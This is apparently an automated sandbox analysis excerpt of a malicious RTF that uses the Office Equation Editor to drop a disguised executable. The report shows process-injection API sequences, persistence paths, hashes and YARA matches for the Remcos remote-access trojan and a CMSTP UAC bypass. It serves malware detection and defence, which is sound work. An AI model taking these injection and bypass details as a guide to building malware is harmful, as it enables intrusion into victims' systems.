Source: name.exe.5.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_27650534-e
Source: name.exe.5.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_b99c995b-6
Source: taskhostw.exe.2.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_b664b9a8-0
Source: taskhostw.exe.2.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_218956b6-4
Source: taskhostw[1].exe.2.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_efee54d2-7
Source: taskhostw[1].exe.2.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_92d865f2-e
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\taskhostw.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe Jump to dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 7_2_0041812A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle, 7_2_0041330D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle, 7_2_0041BBC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle, 7_2_0041BB9A
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5A279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 5_2_00D5A279
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D48638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 5_2_00D48638
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D55264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 5_2_00D55264
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013F5264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 6_2_013F5264
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress, 7_2_004167EF
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AB6336 5_3_02AB6336
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AAC0A1 5_3_02AAC0A1
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02A80687 5_3_02A80687
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AA2707 5_3_02AA2707
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AAE759 5_3_02AAE759
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02A964FE 5_3_02A964FE
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02A92590 5_3_02A92590
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02A94A80 5_3_02A94A80
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AA0A04 5_3_02AA0A04
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AA0EF8 5_3_02AA0EF8
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AACEF5 5_3_02AACEF5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02A94CC0 5_3_02A94CC0
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AA6C13 5_3_02AA6C13
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02B0720D 5_3_02B0720D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02A8F240 5_3_02A8F240
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AAB326 5_3_02AAB326
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AA1310 5_3_02AA1310
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AB9035 5_3_02AB9035
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AA1745 5_3_02AA1745
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02A8D460 5_3_02A8D460
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02A93540 5_3_02A93540
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AA1B7A 5_3_02AA1B7A
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AFF865 5_3_02AFF865
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AB5852 5_3_02AB5852
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AB19AE 5_3_02AB19AE
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AFFCE2 5_3_02AFFCE2
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02A8DC00 5_3_02A8DC00
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02A95C41 5_3_02A95C41
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AB5DC4 5_3_02AB5DC4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02ADDD28 5_3_02ADDD28
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AE7D32 5_3_02AE7D32
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AB7D0F 5_3_02AB7D0F
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CFE800 5_2_00CFE800
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D13307 5_2_00D13307
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D1DAF5 5_2_00D1DAF5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CFFE40 5_2_00CFFE40
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CFE060 5_2_00CFE060
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D04140 5_2_00D04140
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D12345 5_2_00D12345
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D26452 5_2_00D26452
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D70465 5_2_00D70465
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D225AE 5_2_00D225AE
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D1277A 5_2_00D1277A
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D708E2 5_2_00D708E2
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D06841 5_2_00D06841
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D269C4 5_2_00D269C4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D08968 5_2_00D08968
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D2890F 5_2_00D2890F
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D58932 5_2_00D58932
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D4E928 5_2_00D4E928
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D1CCA1 5_2_00D1CCA1
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D26F36 5_2_00D26F36
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D070FE 5_2_00D070FE
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D03190 5_2_00D03190
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CF1287 5_2_00CF1287
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D1F359 5_2_00D1F359
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0139E800 6_2_0139E800
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013B3307 6_2_013B3307
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013BDAF5 6_2_013BDAF5
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0139FE40 6_2_0139FE40
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013A4140 6_2_013A4140
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0139E060 6_2_0139E060
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013B2345 6_2_013B2345
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013C25AE 6_2_013C25AE
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_01410465 6_2_01410465
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013C6452 6_2_013C6452
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013B277A 6_2_013B277A
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013F8932 6_2_013F8932
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013EE928 6_2_013EE928
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013C890F 6_2_013C890F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013A8968 6_2_013A8968
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013C69C4 6_2_013C69C4
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013A6841 6_2_013A6841
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_014108E2 6_2_014108E2
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013BCCA1 6_2_013BCCA1
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013C6F36 6_2_013C6F36
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013A3190 6_2_013A3190
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013A70FE 6_2_013A70FE
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013BF359 6_2_013BF359
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_01391287 6_2_01391287
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013B1604 6_2_013B1604
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013A5680 6_2_013A5680
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013B7813 6_2_013B7813
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013A58C0 6_2_013A58C0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013B1AF8 6_2_013B1AF8
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013C9C35 6_2_013C9C35
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013BBF26 6_2_013BBF26
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013B1F10 6_2_013B1F10
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_01417E0D 6_2_01417E0D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_005E3620 6_2_005E3620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_3_0351ACC7 7_3_0351ACC7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_3_034EA2D7 7_3_034EA2D7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_3_03549CCB 7_3_03549CCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0043706A 7_2_0043706A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00414005 7_2_00414005
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0043E11C 7_2_0043E11C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004541D9 7_2_004541D9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004381E8 7_2_004381E8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041F18B 7_2_0041F18B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00446270 7_2_00446270
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0043E34B 7_2_0043E34B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004533AB 7_2_004533AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0042742E 7_2_0042742E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00437566 7_2_00437566
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0043E5A8 7_2_0043E5A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004387F0 7_2_004387F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0043797E 7_2_0043797E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004339D7 7_2_004339D7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0044DA49 7_2_0044DA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00427AD7 7_2_00427AD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041DBF3 7_2_0041DBF3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00427C40 7_2_00427C40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00437DB3 7_2_00437DB3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00435EEB 7_2_00435EEB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0043DEED 7_2_0043DEED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00426E9F 7_2_00426E9F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_10017194 7_2_10017194
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_1000B5C1 7_2_1000B5C1
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\directory\name.exe D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\taskhostw.exe D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 013B0C63 appears 70 times
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 01397F41 appears 35 times
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: String function: 013B8A80 appears 42 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00402093 appears 50 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00434801 appears 41 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00401E65 appears 35 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00434E70 appears 54 times
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: String function: 02A88FF8 appears 32 times
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: String function: 02A88E20 appears 32 times
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: String function: 02AA7E80 appears 42 times
Yara signature match
Source: WC5Gv13cOQ.rtf, type: SAMPLE Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
